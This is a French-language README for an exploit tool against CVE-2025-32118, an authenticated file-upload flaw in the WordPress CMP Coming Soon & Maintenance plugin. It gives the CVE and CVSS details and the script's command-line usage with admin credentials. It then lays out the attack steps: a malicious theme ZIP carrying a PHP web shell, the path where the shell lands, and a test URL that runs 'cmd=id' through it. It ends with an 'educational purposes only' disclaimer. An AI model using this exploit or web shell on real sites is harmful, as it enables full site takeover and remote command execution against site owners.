
WordPress CMP – plugin Coming Soon & Maintenance <= 4.1.13 - Vulnérabilité d'exécution de code à distance (RCE)
🔍 Titre : Plugin WordPress CMP – Coming Soon & Maintenance <= 4.1.13 - Exécution de code à distance (RCE)
🗓️ Publié : 2025-04-04
🔐 CWE : CWE-434 - Téléversement sans restriction de fichier de type dangereux
📊 CVSS : 9.1 (CRITIQUE) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Une vulnérabilité critique d'exécution de code à distance (RCE) existe dans le plugin CMP – Coming Soon & Maintenance pour WordPress (<= 4.1.13).
Cette faille permet à un utilisateur admin authentifié de téléverser des fichiers ZIP malveillants contenant des shells PHP exécutables, conduisant à un compromis total du site.
<= 4.1.13)python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Admin username
-p, --password PASSWORD Admin password
| Option | Description |
|---|---|
-u | URL de base du site WordPress |
-un | Nom d'utilisateur admin |
-p | Mot de passe admin |
nonce valide pour la requête de téléversement.style.css (format de thème valide)nxploitedshell.php (exploit RCE)?cmd=whoami.Une fois téléversé avec succès, le shell se trouvera à :
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php
Testez-le via :
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id
Cet exploit est fourni à des fins éducatives uniquement.
L'utilisation non autorisée de ce code contre des systèmes qui ne vous appartiennent pas est illégale et contraire à l'éthique.
Nxploited | Khaled Alenazi